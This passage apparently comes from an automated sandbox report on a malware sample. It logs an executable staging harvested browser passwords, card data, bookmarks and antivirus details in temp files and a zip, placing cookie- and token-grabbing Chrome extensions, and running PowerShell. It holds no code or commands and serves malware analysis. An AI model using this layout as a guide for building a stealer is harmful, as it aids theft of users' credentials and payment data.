        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Bookmarks.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Cards.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Cards.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Downloads.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Passwords.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\US_NOVA_user_89.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\US_NOVA_user_89.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\US_NOVA_user_89.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\ZTGJILHXQB.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN\CURQNKVOIX.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN\FENIVHOIKN.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN\VAMYDFPUND.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\IPKGELNTQY.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\LSBIHQFDVT.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\MXPXCVPDVN.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\WKXEWIOTXI.pdf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\ZTGJILHXQB.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extensions.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extensions.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\scripts\background.js VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\salutq8N3G.ps1 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56fdf7f7bd0bdd39adba17a658c03e049j0802\files.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56fdf7f7bd0bdd39adba17a658c03e049j0802 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56fdf7f7bd0bdd39adba17a658c03e049j0802 VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
